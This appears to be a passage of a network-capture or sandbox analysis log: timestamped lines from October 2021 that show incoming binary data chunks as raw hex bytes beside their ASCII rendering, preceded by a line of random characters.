lA#^XsWgNhc1D5>qZ;x{QCDOBj\|cQcsYK.7;i.T.PJR>DO}4H b^2C%t
2021-10-07 13:51:55 UTC	120	IN	Data Raw: 00 8e 71 ac 00 09 cd 5c e6 1d 3b 15 16 ec c1 50 7e 5b 20 81 34 d1 22 20 a2 7e f3 7c 92 72 68 7d 5f 4d 5d fd 97 ef 41 f7 1f 81 88 b0 a2 86 a5 44 0b c1 be 2b 16 6d cb 62 36 bb e0 71 67 f3 88 87 ee 77 34 3f b7 c0 ff 00 f7 0c 8a 0f db 64 fc 77 83 4f 1b 29 32 1b 5b 22 8d e0 8a 39 37 ec 88 8e 80 27 c5 e0 d2 c0 17 84 0c d5 4c 4f 83 9f a3 4b e0 1e 4f 07 bc d9 2a 37 fe 94 6c d5 43 8c 95 18 0e 74 ca bf 25 5a cf f8 38 bb 2c 85 de 4d 73 84 d0 20 2b 59 e2 88 c6 83 6f ae e4 7a 76 46 d3 54 56 fb eb 34 ba c9 9d fd 01 a7 69 51 16 9a 40 cb 6a 6b 8b ac 2f 6e 7d 70 ee 50 90 ac 17 de b7 cf 43 bc f4 c8 56 98 4c ac 94 6d d5 49 bf 3e f4 ff 00 bc 32 2c fa 75 92 19 d5 08 00 97 5f 70 15 fe ee 31 25 5d 5a 3e 97 51 24 7e ab 2e e1 b2 e8 fc 32 d8 c8 2e 1f 43 4d 2c 83 76 c0 17 e5 b6 66 Data Ascii: q\;P~[ 4" ~\|rh}_M]AD+mb6qgw4?dwO)2["97'LOKO*7lCt%Z8,Ms +YozvFTV4iQ@jk/n}pPCVLmI>2,u_p1%]Z>Q$~.2.CM,vf
2021-10-07 13:51:55 UTC	121	IN	Data Raw: b8 ed 65 72 1f 78 dc ce 45 57 5d 03 79 fa cf 52 67 09 04 69 18 e1 9d 81 a2 32 0d 0b 3c ee a8 ec 41 63 b5 88 21 39 1e 2f 20 d2 47 04 2f 7c 90 37 59 3d f3 87 4f 14 b1 06 66 40 5b cd f6 3b ae 32 7d fa 85 30 ae a9 58 b4 81 04 43 90 01 bb 3c f3 40 66 a1 66 d1 49 29 12 97 54 55 d9 19 04 81 67 ed 05 72 38 a0 93 57 23 3e c1 60 7d fc 57 e6 8f 79 01 8c 8a 01 78 5e 55 78 04 fc e4 f3 fa 6a fb 19 76 9b 0f 62 c5 1c 8e 5d 1e 97 ea 4e 91 33 7a 6e 02 3d 53 27 bb a3 88 90 c0 ba cd 31 66 a8 d8 4d f6 f5 b4 f8 e7 ce 16 4f d2 e9 9b 73 1f 49 9b 9f 92 8a c3 9e 73 6c 67 ea 10 8b 72 42 83 f0 3a 27 0c a1 a9 94 b7 67 a3 47 8f 1f ce 6a 27 01 d4 5d 0b 3f e4 64 b0 2b a2 7b cd 03 bb 05 d9 12 4a 17 ba 2d e7 35 3a 9d 0e 9e 2f ea ea b6 ab 39 5e 3b bc 76 01 22 d8 81 91 80 a6 ba bb 17 d1 c9 Data Ascii: erxEW]yRgi2<Ac!9/ G/\|7Y=Of@[;2}0XC<@ffI)TUgr8W#>`}Wyx^Uxjvb]N3zn=S'1fMOsIslgrB:'gGj']?d+{J-5:/9^;v"
2021-10-07 13:51:55 UTC	123	IN	Data Raw: 9e 9b 35 5b 93 88 a4 28 01 8d 7c 66 a9 1d d0 c6 8c 01 7b 5b 6e b9 19 a3 d0 e9 b4 6e fb 26 69 26 da bb 89 eb e0 57 e0 66 92 29 91 25 69 65 04 b3 13 b4 74 3f 6c d5 2c 4c 12 55 21 5a 31 67 c5 e4 ac 6d d5 18 16 2a 6a b9 c8 60 90 c3 ea ac db 86 c0 42 df 6d 8a 27 0c a6 80 4f 39 2c 30 cb 19 0f b4 29 e0 b1 35 59 2b 69 3d 40 55 c3 b2 b1 b6 ef 80 3a 19 12 4b 34 72 38 6a 0c 28 6d 3c d9 e6 ce 04 dd 1a b3 49 18 2e 38 ba 3c f9 ef bc 8b 40 f1 4b 25 14 22 cd 1a f0 70 c0 bb d5 98 2b 95 1d 90 05 78 cf d2 82 f6 c4 00 2e c0 cf d2 c3 5c ee 3c df 27 23 82 15 5b 09 76 28 f9 b1 91 b0 50 40 4a 1d 0c db 29 ae 40 c7 47 7e 19 ef 8a c9 f5 2c ae c1 07 03 da 6f 9e 6f 13 5b 22 1b 91 3d ad 55 5f 8c d3 48 26 8c b0 2a 4f c0 f1 fe 87 07 e3 07 19 af ff 00 f9 27 20 9f b3 a1 9f 4f 31 ae 97 4e Data Ascii: 5[(\|f{[nn&i&Wf)%iet?l,LU!Z1gmj`Bm'O9,0)5Y+i=@U:K4r8j(m<I.8<@K%"p+x.\<'#[v(P@J)@G~,oo["=U_H&O' O1N
2021-10-07 13:51:55 UTC	124	IN	Data Raw: 93 78 ac c5 a6 94 ee 24 2f 16 38 3f e3 23 47 60 81 80 2e c2 8b 1e eb 23 8a 0d aa 19 4d 91 e4 56 3a 5b c6 c0 9a 5f 03 37 1b 25 78 cd ee c6 ef 68 1e 2a ff 00 ce 03 67 90 09 aa bc d5 4a 02 84 15 67 9e ae 86 40 a4 38 20 92 1b bb 1f 19 bf 51 06 aa 78 ca 8d ac 4b 16 3c f6 4d 11 84 95 8d 25 31 28 0d 31 fb 87 3f 92 b7 95 bb 4f f6 9b 53 75 f1 79 32 2a 7a 6e a4 96 1c 5f 6d ee f8 cd 15 2b cd 15 b5 0a 3c 8e ce 38 ae 30 b2 a2 82 79 be 86 33 33 9b 3d f8 18 ab b5 42 ff 00 27 18 d7 18 ba d6 33 92 41 da 54 ad 7c 1e 06 43 fa 77 89 59 95 4f 1e 48 eb 1a 78 f8 58 e2 05 6b 92 45 01 90 6c 3e a8 0a ca 18 fd df 81 f9 39 20 8d 42 b9 2a 76 9e af b3 d0 c7 d4 34 e6 b6 b0 1f 03 1d 12 53 72 92 ab f6 a8 e8 0f f1 85 76 34 77 c2 8b a0 0f 1c 79 39 00 00 06 a6 06 ec 0e 3a fc e0 79 41 f7 aa Data Ascii: x$/8?#G`.#MV:[_7%xhgJg@8 QxK<M%1(1?OSuy2zn_m+<80y33=B'3AT\|CwYOHxXkEl>9 B*v4Srv4wy9:yA
2021-10-07 13:51:55 UTC	125	IN	Data Raw: cc 05 8e 4e 73 d9 39 56 6a f8 c2 79 1f 18 17 83 81 4d 79 39 3e b3 4d a5 58 4c 8f ee 93 ed 51 d9 fc e4 2d a9 9b f5 25 07 a5 f2 41 dc 3d f8 b1 05 5d ab 2e e9 e1 88 94 4b 6f b7 34 aa f1 e8 91 cb 7a ac b4 4b 51 da 0f e2 f1 da 4d 44 6c a0 6d 62 db 91 ec 0d dc 58 aa f8 cd 2c 4f 14 06 22 c2 ca 16 63 e0 33 72 7f 8c 8d f4 ea 4c 92 3d 08 db 68 be 42 fe 4e 4f a8 8f dd 18 99 d7 6b 1e 53 83 7f 8c 8d 35 c9 39 92 09 64 db ce f6 90 83 b8 e6 87 56 d2 c6 7d 62 8a eb e7 70 e4 0f 26 b0 a2 b2 2b a9 04 1e 88 e4 1c 74 0c c5 56 c9 ab 5f 8b c4 e6 b7 85 17 d3 03 8a b2 ab 73 63 f2 56 ee bf 6c f4 c3 d9 aa b1 9b 64 ff 00 79 ea b0 a3 fc e0 43 f0 4e 6c ae f3 c6 5b 0e f8 1f 18 79 1c e0 03 c8 38 14 e4 da a8 62 03 82 c4 9f 19 a9 fa b4 ad 22 ac 41 d1 2c 86 20 df 18 de c1 ba 9c 36 da 4b 06 Data Ascii: Ns9VjyMy9>MXLQ-%A=].Ko4zKQMDlmbX,O"c3rL=hBNOkS59dV}bp&+tV_scVldyCNl[y8b"A, 6K
2021-10-07 13:51:55 UTC	127	IN	Data Raw: 50 a2 30 fd 41 16 29 04 d2 5a 88 81 3c 02 79 61 42 b8 f9 cd 3e a1 9e d8 29 52 2b 80 bc d7 75 c7 e0 e4 93 18 9a 33 b8 85 a2 48 f8 be b0 ef 94 c6 b6 54 d5 82 47 ff 00 99 09 64 5b 02 fd f5 c7 44 dd 76 72 6d f0 85 e4 01 b4 1b 14 71 35 42 59 21 58 c1 0d bf 94 22 cd d7 35 d7 19 1b 4a 4d a2 38 4d fc ad 5b 1a 1f 8e 46 6a e2 94 6e 9d 65 f4 c0 2a 5c 55 6f 23 e2 cf 63 0c 92 cc e6 37 0e ec cf 77 f8 e4 2f ed 9a 1d 1d 4a c2 50 29 94 5d 0a fe 08 ea c6 2a 85 55 51 74 3e 79 39 43 23 1c b3 9e 97 1d 89 37 86 c0 e3 14 58 e7 8c bf ce 00 2f 07 7c e1 c5 60 62 03 e3 3c 66 bf 42 ba d8 e3 5b 5d c8 d6 a4 e1 fa 83 c1 a8 d4 e9 52 2f 4d 63 24 34 a4 64 fa 6d 39 95 dd 65 2f b8 ff 00 ee 50 f7 f8 e7 8c 87 4c 24 68 4f 2c 86 12 01 eb 77 1f 1f 83 90 ba 44 29 8a 91 b7 da 4b 57 7e 78 bf 8c d5 Data Ascii: P0A)Z<yaB>)R+u3HTGd[Dvrmq5BY!X"5JM8M[Fjne\Uo#c7w/JP)]UQt>y9C#7X/\|`b<fB[]R/Mc$4dm9e/PL$hO,wD)KW~x
2021-10-07 13:51:55 UTC	128	IN	Data Raw: 51 25 f2 6d 02 65 76 a7 61 c8 7c 85 67 72 4b 74 66 12 c7 e4 a1 d5 5f 52 61 72 f8 b1 88 c9 5c f4 99 9e f9 94 c0 c6 cd 5b 6f 54 a7 c1 22 0f 2a 37 19 1c 9e 43 58 bf 52 61 ac 6e 93 23 42 2d 40 48 f2 92 a3 29 01 d7 f2 ad dc 6a e7 a5 e5 cf fa 99 31 53 56 86 c4 b3 d0 85 27 af 34 cd 2c 54 66 66 81 1c 18 7b 15 50 35 8e b1 63 15 2d 7a b5 7d 5f e9 c4 7a b9 3a 7e e6 55 89 52 7c 6c e6 64 b7 5d e4 60 24 84 4a 79 79 54 d5 58 32 76 d3 9d 0b 74 39 cf 8f cd c6 9f 7c d8 f9 07 22 59 7f f7 61 6f 9c 47 4f ff 00 cc d3 05 c3 7a a6 d2 34 30 d7 aa 83 94 78 67 0e 00 ac c8 77 64 fc 58 3f ea d5 af 54 4b 8a c6 de 83 d4 42 84 47 d9 64 28 c2 86 54 45 b6 fb 43 24 d0 49 dd 3a 45 dc 02 c0 0d 7a 76 de 1e dd 74 b3 8a c6 e1 be 02 ac ac 43 c3 72 3b f2 15 9c ce 83 ed 74 58 b5 16 5f 00 5c 47 53 Data Ascii: Q%meva\|grKtf_Rar\[oT"*7CXRan#B-@H)j1SV'4,Tff{P5c-z}_z:~UR\|ld]`$JyyTX2vt9\|"YaoGOz40xgwdX?TKBGd(TEC$I:EzvtCr;tX_\GS
2021-10-07 13:51:55 UTC	129	IN	Data Raw: f3 11 b8 ff 00 f3 0a ac 68 c1 18 80 a6 c4 51 c4 4e bf 98 ac ef d0 a8 32 11 2e 3f 2f 89 62 3f af 15 84 64 82 53 f8 69 e3 78 d5 77 d8 82 35 99 95 e8 2c c9 53 3f ed fd b5 dc 7a a7 78 4d ab 3c e4 8a d2 44 8e 1b 78 a5 e2 0f 88 ce 8e 73 d3 f7 a8 15 bf 7c 13 93 a8 6b 43 f6 0b 71 02 6c a1 89 07 13 3a 75 c9 43 e0 0d 50 b7 8f ad 62 07 96 c6 2a b0 cf 51 82 39 79 46 ab c6 37 86 c4 28 e4 fc 64 48 0f 7f f3 1d 50 f5 b5 6a 81 0d 3c 1d cb f2 7f 29 8e 83 c3 9c 6d b6 7a f3 d6 71 c4 85 8e 45 09 e0 73 1a 93 2f 8c 86 e4 dc bd 23 ea 09 01 9a ac dd 6e 93 c3 15 b4 89 5e a3 ee e0 f4 d9 0a b6 9b d3 78 8b 2c cf 84 c6 e7 26 8a 1a f3 41 60 ac b2 d4 8a c4 09 22 3f b4 97 fa 0f 1b 82 88 cb e1 86 b1 b7 24 c9 da 16 b1 de b8 ca ab 3a 8f 61 51 10 52 12 c6 81 d2 d4 11 a7 d2 65 1f 5b e4 47 cb Data Ascii: hQN2.?/b?dSixw5,S?zxM<Dxs\|kCql:uCPb*Q9yF7(dHPj<)mzqEs/#n^x,&A`"?$:aQRe[G
2021-10-07 13:51:55 UTC	131	IN	Data Raw: dc 37 06 5d 89 45 5e fb 91 a6 36 ae 5c 33 d7 ab 58 3b 49 50 c2 ac a0 94 52 c8 8d c4 12 e0 fe 37 d6 6e cd 8c 7a 7c 29 55 89 44 6f 69 79 31 f7 60 26 dc 41 1b 21 5d c7 e1 86 bd 43 2d ab cc cb 2c a2 36 98 72 68 d7 66 ea 43 e3 80 00 03 1a ec 3e 43 4a 2a d1 9f aa 56 48 82 b4 aa bb 00 81 e7 55 10 b0 5f b3 90 d6 6e 0c 81 dc d5 63 1d 3c 5e ee a3 8b 95 b8 5c 19 52 42 fb 30 d6 1a 29 a8 59 58 20 81 21 e7 17 56 d2 85 41 07 b4 63 1c 2e 57 67 63 02 aa 9f 0e fa ba 31 98 39 a6 83 8b 4b 2c e9 8a 9b e3 d4 35 67 ae df e1 d9 7a a8 39 c2 ea 9d c2 7c f5 80 cf e0 f2 96 39 b1 c8 d3 86 ca 4b 3f 10 9c e7 92 82 49 1c ad f7 16 71 0f 54 76 dc 6a 7b d8 0c bb 44 22 f4 77 a8 f8 de 86 ec 0e 8b 1a 45 8a c9 a0 95 3b 17 0e b0 ca 49 1f e8 1a ab ea 08 21 74 39 ef 4e 67 d9 ea e6 31 6e c8 1d 23 Data Ascii: 7]E^6\3X;IPR7nz\|)UDoiy1`&A!]C-,6rhfC>CJ*VHU_nc<^\RB0)YX !VAc.Wgc19K,5gz9\|9K?IqTvj{D"wE;I!t9Ng1n#
2021-10-07 13:51:55 UTC	132	IN	Data Raw: f1 7d 5d a9 38 c9 4f 5e 5b c5 19 6b 55 dc 3b 44 bb 42 ac a8 ae 06 e8 09 24 90 75 28 48 2c 28 a7 3c 75 6c 49 0c 71 a2 b9 dc 3b 74 83 ac 67 e3 c0 6a 09 ac 9b 4a 27 be 6e 58 dd 91 a6 0e 93 05 3b 2a 21 3e 49 e4 e7 4b 36 39 b1 71 84 c7 56 3c 2e aa c1 3c 6e ea 26 65 64 6f 98 3e 07 61 ac 85 58 68 c2 9c b1 76 e3 73 1c 96 1a 00 55 d2 d4 00 20 3b 95 2e 09 2c 43 6a ed 8b af 3c f4 ad c3 42 42 b5 e5 94 93 cd 95 a4 58 64 57 8a 3d de 54 e1 b9 e3 af 4f c8 1e 63 34 b1 da bd 3c 6d 12 90 5d 76 49 10 32 f2 0b a9 f2 55 6b c0 63 c4 62 71 32 49 0d 48 16 bb 06 69 16 20 6a b4 87 9b f7 4e 63 f2 4e b0 52 e6 e3 a8 9c 6b 56 ab 3d 6b 1d 19 90 fc a6 5b 32 77 70 1c 16 76 47 21 89 1a bf 8a f4 a2 bd f9 32 d4 32 93 09 2a da a8 d2 f3 60 ca 8c 8d 13 2b 36 d0 a2 f1 df c8 03 55 b3 3e 9d af 49 Data Ascii: }]8O^[kU;DB$u(H,(<ulIq;tgjJ'nX;!>IK69qV<.<n&edo>aXhvsU ;.,Cj<BBXdW=TOc4<m]vI2Ukcbq2IHi jNcNRkV=k[2wpvG!22`+6U>I
2021-10-07 13:51:55 UTC	133	IN	Data Raw: ba b0 9f 89 09 b1 29 c5 82 ee 06 e3 4f 8a 5b f3 ca f0 de 4b 95 4d e7 ad 3a ba 34 11 44 0b cb 0a 73 27 61 e4 0d 8e ab 4b 7e 10 21 9d a6 96 f7 5f 1e ac a8 52 29 24 9c af 60 c0 8f 81 db 8e af e3 28 4a 81 68 4b 5e 66 44 6b d3 94 80 24 ed 62 34 63 1e d0 10 ac c5 78 2e a3 af 5e 95 21 62 96 53 ad 5e 43 6c 2b 07 82 14 e4 42 c9 27 1f 89 25 80 00 6f aa b8 b9 27 ca 49 63 25 6a 7a 51 64 66 bb 45 e1 43 05 33 3c 84 a4 49 0f c9 e5 ec 40 62 a7 5f e1 ed 2f 46 c7 a6 c8 25 a1 7a 4e 10 d8 8a 48 42 af 09 40 df c0 d7 f1 b7 72 9e 95 92 6a 31 d7 7b c4 c1 62 70 92 b7 d4 b4 01 e0 c1 41 0e 9d 97 c0 27 53 d9 bd 5d ee 34 d0 46 51 5e 19 a7 76 95 95 fa 52 c6 b2 31 fc c8 03 79 df 6d 5e b7 95 2f 6e 4b 52 41 61 5e 11 15 6b 2f 32 08 c8 04 70 54 dc 7c 87 65 3a a7 2f aa 2d e2 ef 18 c3 49 5b Data Ascii: )O[KM:4Ds'aK~!_R)$`(JhK^fDk$b4cx.^!bS^Cl+B'%o'Ic%jzQdfEC3<I@b_/F%zNHB@rj1{bpA'S]4FQ^vR1ym^/nKRAa^k/2pT\|e:/-I[
2021-10-07 13:51:55 UTC	135	IN	Data Raw: 2b 00 b1 a1 91 e7 f2 a0 85 e2 75 54 60 0e 4a bc 56 1d 64 b2 88 fd d6 3e 71 ce e6 09 67 73 c8 01 10 66 e4 75 07 a5 7d 2d 8e b2 d4 79 d6 b4 6c ae 4d a7 53 08 55 de 24 60 11 a3 e0 ca a3 b3 10 35 02 3d 38 66 82 0a f5 0c 70 dc af 2c b3 02 c0 a2 27 09 38 30 e5 18 70 19 77 d8 ea 50 3d 3f 66 a5 a7 b8 61 89 e5 94 45 37 b5 70 a1 1c 21 47 5b 1b bb 0d 82 78 d6 18 e2 e4 49 6c a6 47 20 22 8e c2 ab 11 08 01 2a 74 dd 64 91 38 90 a8 c0 ea fd 38 cd 7a 31 d1 b4 8d bc 13 c4 14 ac fc f6 2d 21 31 88 d9 f7 71 b9 23 b3 69 72 98 2a c2 19 e6 ac 56 c5 38 a5 e2 16 41 1c 91 9e 2f ba 37 c0 37 8e 5a af 2d d1 4a c4 51 ac f2 ad 98 a0 50 36 71 09 dc 82 ca ac 18 b0 dc af cb ce af 5b 74 ac c2 ff 00 46 46 31 8a e0 c6 aa 56 20 4f cc 82 4a a2 8d ce ad 5d ca 0e 1e d0 c8 45 e1 62 c4 d2 1e 8c 42 Data Ascii: +uT`JVd>qgsfu}-ylMSU$`5=8fp,'80pwP=?faE7p!G[xIlG "td88z1-!1q#irV8A/77Z-JQP6q[tFF1V OJ]EbB
2021-10-07 13:51:55 UTC	136	IN	Data Raw: 84 3c a3 91 67 94 b0 12 bc 8c aa 9b f1 2f ba f8 61 aa d8 64 be d6 ad cb 1c b6 62 b2 b4 e4 7e 73 ed 34 21 e5 66 e6 e9 f1 11 21 24 91 cb be b0 16 68 4a b0 cb 35 8a 90 cf 2d 93 62 5d b9 97 86 71 01 8b a9 f7 6f df 7f 3a f5 45 88 9e 29 2d d0 ab 53 a1 5e 29 a2 fb cc 72 43 12 3f 18 dd 07 9e 60 ea fe 36 d5 58 cc c6 86 0f 27 33 8a e5 49 12 92 8e 81 fe 9f 01 bb 0e dc b5 92 4a 0d 6c cb 62 8d dc 5c dc 26 25 ca da 06 62 80 3b 30 23 67 ea 82 df 8d 63 56 ed 04 ad 3d 4a 77 2f c9 62 a4 32 09 0f 39 90 47 13 13 21 1d f6 63 ac 65 7b 50 54 95 e9 18 64 d8 47 33 ca a5 42 09 48 e4 bc 51 55 c1 1e 0e fa 9e ce 42 ee 16 78 ad 4b ca c7 46 68 e2 85 98 81 1a aa 45 cd 88 ec ff 00 80 08 03 52 5c b3 53 fe 26 c7 3e 4d 85 70 92 c1 3e 4a 09 e8 b4 48 86 52 0a f2 64 5f bc f1 03 56 6c b9 8b 2c Data Ascii: <g/adb~s4!f!$hJ5-b]qo:E)-S^)rC?`6X'3IJlb\&%b;0#gcV=Jw/b29G!ce{PTdG3BHQUBxKFhER\S&>Mp>JHRd_Vl,
2021-10-07 13:51:55 UTC	137	IN	Data Raw: b8 3c 4c e1 e4 6f 0e d0 00 46 c8 18 ea 14 af 8c 9f dc c8 a2 bb 4a 07 05 25 59 39 95 fa a1 bb a6 82 56 bb 89 f7 55 c5 94 51 24 4f 3c b0 59 88 8e 3d f9 ba 47 26 fc 37 61 b1 5d 59 c6 5c bf 5d 6a e4 6b 04 7f 76 95 eb 09 a2 2d 60 10 87 8b 97 41 b7 fc 87 72 35 3b 59 80 da 0b 2c 6a df 02 97 19 79 ef fe 56 51 b1 d5 bc 9d 3a b7 ab 25 e9 a2 97 db f4 11 d9 e6 58 08 94 10 18 12 fb 72 50 09 1b 8d 0b d8 c9 6b 45 48 50 af 38 90 cc 6d 48 1d 65 25 08 52 62 ec a8 46 eb bf 81 ac ee 43 d4 50 35 aa cf 62 ed 36 7a 16 e4 8b e7 22 d7 2b c0 f1 f9 76 e6 7f 6c 54 eb 0d 4a a5 a8 e0 7c a6 4e ad 54 e5 55 61 08 19 61 e1 c0 37 65 d8 2f 60 58 ef be aa 63 4c f0 cf c6 49 a7 8c 5e 31 44 8a a2 57 f6 f0 f2 2c 24 f9 85 3b a9 3a 7c ad bb db cb b3 c2 63 a9 57 da 6f ed e3 e5 0b b2 bc a4 af 74 e3 Data Ascii: <LoFJ%Y9VUQ$O<Y=G&7a]Y\]jkv-`Ar5;Y,jyVQ:%XrPkEHP8mHe%RbFCP5b6z"+vlTJ\|NTUaa7e/`XcLI^1DW,$;:\|cWot
2021-10-07 13:51:55 UTC	139	IN	Data Raw: dd 7a bc 95 15 10 ef 1f 13 aa 32 e3 d5 4b 3d d1 61 0c 28 ab e4 b3 ef b0 03 59 1f 59 5c 89 c2 cf 7a 0a 53 cf 46 1f f6 11 0e 52 6a d6 1b 39 67 24 64 96 f3 63 06 2e b8 46 5d e5 13 bc 9d 25 28 dc 47 27 24 b6 b0 2d 5a c2 d6 b1 50 c7 37 5d e2 85 9b 89 29 1a 09 5f 9b 14 25 54 9e cb a9 7a b4 ea f4 71 98 e7 82 68 af db 13 cb c8 cc 48 57 6e 08 a8 c0 fc b6 db 8e a4 59 33 1e a4 b1 52 25 86 68 b8 04 5a ea 47 e7 8e c8 27 db 70 78 a8 d1 ab 97 97 25 24 90 d0 ab 18 50 12 27 52 8b 26 ec 14 2f 7d cb 37 76 ee 40 60 77 d4 e3 29 66 38 1e ba 59 61 22 fd 69 43 28 11 81 c5 c9 fc 31 f1 df 58 a5 93 11 93 8b 8e 41 0f 4e ab c0 d3 7c d5 bb 00 92 3a f7 0b fe 70 46 dd c1 d5 fb d1 e1 44 77 ec 58 09 1c 94 b9 d6 56 4e 0b 2c d1 6c ee 8c c7 62 8b b1 63 ac a5 8b 11 19 24 00 cc 65 81 6a 86 06 Data Ascii: z2K=a(YY\zSFRj9g$dc.F]%(G'$-ZP7])_%TzqhHWnY3R%hZG'px%$P'R&/}7v@`w)f8Ya"iC(1XAN\|:pFDwXVN,lbc$ej
2021-10-07 13:51:55 UTC	140	IN	Data Raw: bd 81 d1 1f b2 8a 7b ff 00 be a7 f5 25 8b 75 20 68 60 4c 7d 58 12 1d ed c1 1b 42 ef 15 b9 4b bc 44 f4 ce c9 e5 86 a8 b7 aa db 11 35 68 f1 73 c0 ab 05 14 9d d5 e3 b1 6f b3 12 e5 d7 b2 1f 97 1e da bb 90 c9 99 6a 7f 21 33 e3 cc d6 ba 4f 1a 40 65 8d e5 d8 2b 3b b9 0a a8 a0 92 76 3a 86 38 31 ce ab 76 26 79 9e 07 b5 1f ca c8 2d 02 c9 24 8c 3b 34 85 76 41 dd 77 2a 34 72 46 c5 17 59 20 b3 5a 79 e7 22 24 e4 7e 9c 03 e9 a2 08 c9 58 67 65 5e e0 9d 0b b7 1e a9 8a 18 5e da c7 4e 84 5b 21 e0 91 56 91 55 9d 4b 1e 4d e4 6a 8c d9 47 c8 11 60 40 0c 49 15 55 88 72 59 e1 af 2c 24 6e 77 1b 3f 8f 24 0d 62 ea e3 e7 c8 87 93 db de aa b2 c6 50 b2 ca 51 66 33 ca 49 00 97 90 93 ab eb 5b d3 5e fa 8d 4f 6a ef 14 73 87 04 2a 19 56 30 0a 22 c9 bf 26 d4 d9 3a 35 67 96 31 5f 15 7e 45 48 Data Ascii: {%u h`L}XBKD5hsoj!3O@e+;v:81v&y-$;4vAw4rFY Zy"$~Xge^^N[!VUKMjG`@IUrY,$nw?$bPQf3I[^OjsV0"&:5g1_~EH
2021-10-07 13:51:55 UTC	141	IN	Data Raw: 46 dc 95 75 7f 23 97 9e 14 5e b4 76 92 ad 65 ac 36 56 88 86 e2 ca c8 88 7a 7e 77 3b 76 d4 98 d8 f2 15 85 69 55 66 e6 de d8 b2 f3 51 24 fc fe 44 a7 9d 4f 91 b1 90 ad 66 3b 06 4a e8 e8 a5 01 e9 bc 66 45 3b 14 65 5d c8 f2 bd b4 ed 76 45 54 9b 9a 2a 71 e9 ec 00 2b 18 51 d8 0d 41 fc 36 3d 1e cd 55 46 30 fb c9 ab 48 8c e5 b8 a4 ac 51 55 88 63 c7 51 5a 86 47 f7 53 ca d0 18 5e b9 8d 91 15 04 31 6c 83 b2 76 1d b7 fc 8e fa 79 c4 55 5e 39 6f a5 69 77 e3 c3 e0 bc 17 e0 a0 f6 55 23 e1 bf f6 1a 8e 98 b1 71 1a 29 52 b2 57 8f 69 8a ee ca 48 50 57 f4 be 07 81 a9 b2 31 45 1c 0c 93 bc 22 36 4b 11 ee 93 c6 c8 19 83 0e 63 b7 cb 58 f7 8a 5a f5 ad db f1 0c b1 58 ba 02 d8 85 22 42 4b b4 4c a1 47 8f c3 6d b6 b1 d6 2b e5 af e3 ac 4f ee ac c9 0c 53 33 0f fe d4 fc 62 78 92 2e a1 49 Data Ascii: Fu#^ve6Vz~w;viUfQ$DOf;JfE;e]vET*q+QA6=UF0HQUcQZGS^1lvyU^9oiwU#q)RWiHPW1E"6KcXZX"BKLGm+OS3bx.I
2021-10-07 13:51:55 UTC	143	IN	Data Raw: 65 53 aa 16 d1 64 65 22 cd 69 7a 8a ea 76 65 71 1a a9 05 4f e0 eb 1b 7a 4a cc ab 2c 30 b3 54 6d 8a 82 18 75 d8 b7 13 fb e3 ac 94 68 8a 39 49 08 0d 10 fe dc e4 e0 35 14 98 e4 c7 a4 94 3d 13 4e 69 c3 f4 22 26 44 97 31 2c 60 18 6b c4 76 26 24 d9 14 ec 49 00 6b d3 96 b2 49 59 ce 1a 9d 1e 70 51 a2 d1 05 0c 61 67 58 e1 9d 02 29 0a 61 59 10 13 f3 3a bf 0d d9 73 b7 27 ba 65 9d 88 af 52 a0 11 87 f3 b6 dd 49 1c 2f fc c4 ec 35 25 98 22 91 de ad 46 b0 66 8d 64 e3 b0 32 aa 07 8a 37 23 6e ee 54 0d 6c 64 42 e2 4b 3c 82 70 1d 81 2e 06 e7 f4 0e 91 2b 53 ca a5 3a f0 47 f5 12 59 3a 61 d9 bc ff 00 4c 12 00 d4 b5 6b db 78 92 3e 72 96 69 5d 01 e6 e8 14 05 03 f4 00 d8 01 e4 9d 4d 0d 78 d3 67 9a c8 23 e2 36 24 46 58 fc bb 1d b4 c6 b7 23 c8 b4 5b 00 fe 76 dd 46 db 7e 06 9b 62 00 Data Ascii: eSde"izveqOzJ,0Tmuh9I5=Ni"&D1,`kv&$IkIYpQagX)aY:s'eRI/5%"Ffd27#nTldBK<p.+S:GY:aLkx>ri]Mxg#6$FX#[vF~b
2021-10-07 13:51:55 UTC	144	IN	Data Raw: 43 2c 8a e2 d5 c7 10 f0 08 09 25 22 21 00 1f 82 4e fa c5 1a c9 b8 f7 11 bc 91 43 fd c2 ba 0e 52 91 fa 88 79 f2 46 8e 0a 07 89 1e bf b8 0b 3e 42 e0 5f cd 5a af d4 e9 8d bb 02 43 3e b2 e9 45 a2 4c 9c b7 ec d7 6b 77 b2 72 41 20 54 57 94 9e 55 62 53 b1 70 c1 39 f8 1a 92 8e 40 c2 c2 07 77 a7 5e 07 7d f6 0c e2 29 41 6d bc ec 7c f8 dc 6b 21 60 d8 b1 2f bd c8 da 48 21 92 cd b1 21 13 49 33 86 62 c0 b8 3f 60 28 3c 2e b0 92 a5 0c 77 b5 ae 93 da ff 00 0f 55 e4 90 3c bf 55 e1 f9 4a fc 57 60 17 e3 b6 84 b3 c8 23 ad 05 b4 79 6a 56 15 90 6e bc 91 3a 6f 29 04 91 f3 ec 3f 1b 6a 0b d5 b2 b6 d6 53 46 c2 b1 82 49 20 61 12 96 4e e0 71 db b7 2d 4f 63 37 ea 9a 92 de 83 12 86 0a 2f 42 b6 36 a6 f5 44 85 81 75 32 84 0e e9 c9 14 f1 d8 a9 23 be 62 7f 48 de f5 81 83 30 c6 5c 7f 42 e5 Data Ascii: C,%"!NCRyF>B_ZC>ELkwrA TWUbSp9@w^})Am\|k!`/H!!I3b?`(<.wU<UJW`#yjVn:o)?jSFI aNq-Oc7/B6Du2#bH0\B
2021-10-07 13:51:55 UTC	145	IN	Data Raw: 89 17 24 f9 f2 12 36 ad 09 e8 d5 b8 d3 49 c2 5e f6 ac da 6b 51 ab 00 f2 80 f1 05 08 39 b7 0d 87 20 74 97 e0 7b ea 2a e3 66 25 22 92 35 0d 2d ab 56 8c 6c 92 4a ce a9 e5 db 93 e9 ee 43 6a fb 4b 0a a4 1e c5 25 83 17 1d 89 03 de 70 42 48 8c 7e 01 76 55 f9 03 df 62 ba b7 4f 3f 3d b5 a7 1d 9b 0e ef 15 aa b7 e2 2e 16 74 48 ae 44 06 ca e1 94 c8 bd 87 90 35 e9 c8 bd 3d 2e 26 58 71 b3 54 a5 15 95 86 49 7e 4e 2a 9a cc a4 c9 22 4a bf 27 1b 6f f6 eb 35 6e d5 09 11 62 ad 49 21 54 47 68 d9 e6 47 97 cf c9 bb 12 47 6f 00 6a de 31 f1 93 c9 12 99 b6 89 91 e4 54 59 51 db 93 34 8e 1d 77 d8 80 13 6d d7 ce a6 85 af 54 36 17 20 18 19 0b ac d1 80 14 8e cd e3 b8 df e4 0f 8d 51 06 7c 77 24 25 1a 7f 6f 14 a8 37 0a 7c ab 72 ec 0e a1 c8 45 4e 